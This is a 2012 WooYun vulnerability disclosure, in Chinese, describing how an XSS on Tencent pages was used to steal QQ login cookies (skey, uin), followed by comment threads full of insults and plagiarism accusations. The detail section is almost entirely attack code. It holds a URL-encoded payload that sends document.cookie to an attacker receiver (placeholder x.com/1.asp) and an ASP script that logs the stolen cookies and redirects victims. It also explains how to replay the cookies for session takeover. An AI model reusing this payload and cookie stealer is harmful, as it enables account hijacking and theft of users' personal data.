当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09800

漏洞标题:利用腾讯XSS截取QQ资料

相关厂商:腾讯

漏洞作者: 丛生草

提交时间:2012-07-17 19:00

修复时间:2012-08-31 19:00

公开时间:2012-08-31 19:00

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-07-17: 细节已通知厂商并且等待厂商处理中
2012-07-18: 厂商已经确认,细节仅向厂商公开
2012-07-28: 细节向核心白帽子及相关领域专家公开
2012-08-07: 细节向普通白帽子公开
2012-08-17: 细节向实习白帽子公开
2012-08-31: 细节向公众公开

简要描述:

利用欺骗地址是目标登录QQ,收到COOKIE后截取skey= uin=。。。。然后用COOKIE浏览器模拟进入

详细说明:

xss页面欺骗地址:support.qq.com/login.shtml?fid=688&url=http://data.euro2012.qq.com/eurocupTencent/eurocup/euroLive.action?mid%3D%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%25%33%44%22替收信地址(填写asp收信地址,如:http://www.x.com/1.asp 也转换为url编码来增加隐藏性!)%3F%22%25%32%42%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E
X(随便命名).asp截取代码:
01<%
02if instr(Request.ServerVariables("Query_String"),"uin")>0 then
03 set fso=server.CreateObject("Scripting.FileSystemObject")
04 set txtfso=fso.OpenTextFile(server.mappath("guige.txt"),8,True)
05 txtfso.WriteLine("CO:"&Request.ServerVariables("Query_String"))
06 txtfso.WriteLine("time:"&now())
07 txtfso.WriteLine("-------------------------------------------------------------------")
08 txtfso.close
09end if
10response.redirect"http://my.qq.com/"
11%>

漏洞证明:

修复方案:

不要轻易相信QQ好友发送的链接和诱惑,谨慎点击。。

版权声明:转载请注明来源 丛生草@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2012-07-18 10:37

厂商回复:

谢谢反馈,我们正在跟进处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-07-17 19:16 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    你也有杀气啊

  2. 2012-07-17 19:21 | 丛生草 ( 路人 | Rank:7 漏洞数:2 | 我是宋几,我是大黑阔,很有钱,你们全是SB...)

    @xsser 什么杀气。话说,貌似见过你

  3. 2012-07-17 19:42 | 小乖 ( 路人 | Rank:21 漏洞数:6 | 这个家伙很懒,什么也没留下。)

    90sec出来的,鄙视楼主。

  4. 2012-07-17 19:49 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)

    只能说垃圾越来越多,从90sec来的

  5. 2012-07-17 19:49 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)

    @小乖 你看看,90sec里面的东西,居然有人放到这里来提交了

  6. 2012-07-17 20:06 | j14n ( 普通白帽子 | Rank:114 漏洞数:23 | 我是一只小小小小鸟....)

    鄙视楼主 同样90sec过来的人

  7. 2012-07-17 20:27 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    关注~

  8. 2012-07-17 20:36 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    丛生草:我是宋几,我是大黑阔,很有钱,你们全是SB,我会骗人会耍赖,打架 我妈带十几个人砸掉一网吧。110都怕了。谁敢惹我。

  9. 2012-07-17 20:36 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    霸气签名

  10. 2012-07-17 20:49 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @水滴 我以为你这是怎么了呢 刚看明白 呵呵

  11. 2012-07-17 21:22 | 小一 ( 实习白帽子 | Rank:32 漏洞数:13 )

    @水滴 没看懂,但是好像仇深似海啊。。。

  12. 2012-07-17 21:22 | 鬼哥 ( 普通白帽子 | Rank:136 漏洞数:13 | 鬼哥 !!!!)

    我只能表示无于,,90sec那人ID我会删了去。鄙视。

  13. 2012-07-17 21:31 | j14n ( 普通白帽子 | Rank:114 漏洞数:23 | 我是一只小小小小鸟....)

    @鬼哥 此dog必除

  14. 2012-07-17 21:35 | 我了个去 ( 普通白帽子 | Rank:139 漏洞数:14 | 4892057@qq.com ...)

    同样90sec的淫火钳围观

  15. 2012-07-17 21:37 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    根据楼主的描述,貌似是一个储存型的XSS

  16. 2012-07-17 21:44 | x0ers ( 路人 | Rank:25 漏洞数:4 | 专注计算机:开机关机重启20年。)

    鄙视.人家都说了不要提交.这点RANK对你这么重要?

  17. 2012-07-17 21:59 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    @水滴 楼主就是SB....楼上都说是90sec copy来了..呵呵 @xsser 你懂怎么做的

  18. 2012-07-17 22:01 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    @鬼哥 求个90sec邀请码啊- -

  19. 2012-07-17 22:38 | 继续沉默 ( 实习白帽子 | Rank:62 漏洞数:9 | 好好学习,天天向上)

    90sec复制的,不要脸

  20. 2012-07-17 23:25 | null ( 路人 | Rank:15 漏洞数:2 | 左岸是无法忘却的回忆,右岸是值得把握的青...)

    尼玛,真不要脸。

  21. 2012-07-18 02:10 | 鬼哥 ( 普通白帽子 | Rank:136 漏洞数:13 | 鬼哥 !!!!)

    @Valo洛洛 OK

  22. 2012-07-18 02:36 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    @鬼哥 真心的我也求个!~

  23. 2012-07-18 09:02 | 瓜瓜 ( 普通白帽子 | Rank:173 漏洞数:25 )

    @鬼哥 同求

  24. 2012-07-18 10:45 | aomm ( 实习白帽子 | Rank:53 漏洞数:9 | 撒啊啊)

    @鬼哥 那我也要邀请码。。

  25. 2012-07-18 11:03 | 一粒米 ( 路人 | Rank:4 漏洞数:2 | null)

    @鬼哥 同求

  26. 2012-07-18 11:15 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    @一粒米 @aomm @瓜瓜 @Henry:bobo 你们不要酱紫-。- 鬼哥会尴尬的

  27. 2012-07-18 18:06 | 瓜瓜 ( 普通白帽子 | Rank:173 漏洞数:25 )

    @Valo洛洛 嘿嘿,不会滴

  28. 2012-07-19 01:04 | 啤酒 ( 实习白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

    有程序员群么有..36363839*求加-—_—---_--—_—--

  29. 2012-07-19 01:52 | hongygxiang ( 普通白帽子 | Rank:115 漏洞数:12 | 蛋疼)

    90sec菜鸟前来围观

  30. 2012-07-19 19:37 | darksn0w ( 实习白帽子 | Rank:62 漏洞数:10 | 无折腾,不生活!)

    @Valo洛洛 尴尬你妹,几个月没来,你都200多了啊。。。

  31. 2012-07-20 09:11 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    @darksn0w 我也快俩月没提交了- - 围观比较有乐趣

  32. 2012-07-20 09:13 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @鬼哥 把我加进去吧 我发现90sec还不好加入呀 呵呵

  33. 2012-08-07 12:57 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @鬼哥 删了这个天收!!! -_-我是小铸呵呵。

  34. 2012-08-17 11:06 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    复制来的,真不要脸

  35. 2012-08-31 19:53 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    90sec的东西..........

  36. 2012-09-01 02:32 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @xsser楼上好多ID我都想直接封了..怎么办

  37. 2012-09-01 10:32 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @only_guest 要封人,先自封~

  38. 2012-09-01 12:13 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @imlonghao 让二哥秒了你...